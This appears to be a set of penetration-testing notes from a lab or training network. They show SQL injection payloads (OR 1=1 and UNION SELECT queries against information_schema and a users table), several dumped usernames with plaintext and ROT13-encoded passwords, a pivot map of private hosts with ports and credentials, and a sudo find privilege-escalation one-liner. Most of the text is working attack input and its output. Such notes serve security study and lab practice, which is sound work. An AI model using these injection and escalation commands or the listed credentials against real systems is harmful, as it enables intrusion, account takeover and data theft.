- /etc/hosts

product=<xx> OR 1=1 ;
product=7 UNION SELECT 1,3,2; < ---- Guessing and checking until you can see the full output
    - Output - 1,2,3
product=7 UNION SELECT table_schema,column_name,table_name from information_schema.columns;
                              1           3          2

    - Output - Table_Schema, Table_Name, Column_Name
                 (Database)

product=7 UNION SELECT user_id,name,username from siteusers.users;
            Column Names_______|          DataBase____|       |______ Tablename 

UNION SELECT <Column>,<Column>,<Column>,<Column> from <database>.<table>
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

product=7 UNION SELECT table_name,1,column_name FROM information_schema.columns
product=7 UNION SELECT * FROM users

     - Aaron - ncnffjbeqlCn$$jbeq - apasswordyPa$$word
     - user2 - RntyrfVfNER78 - EaglesIsARE78
     - user3 - Obo4GURRnccyrf - Bob4THEEapples
     - Lroth - anotherpassword4THEages

+---------+  PublicFacingWebsite
|         |  10.50.41.20
|         |  user2 - EaglesIsARE78
+---------+  22
     |       80
     V
+---------+  WebApp
|         |  192.168.28.181
|         |  22
+---------+  80
     |
     V
+---------+ RoundSensor
|         | 192.168.28.172               root access: sudo find . -exec su root \; -quit
|         | Aaron - apasswordyPa$$word
+---------+ 22
    |
    V
+---------+ Internal Window
|         | 192.168.28.179
|         | Lroth - anotherpassword4THEages
+---------+ 22 
            9999 Secure Server
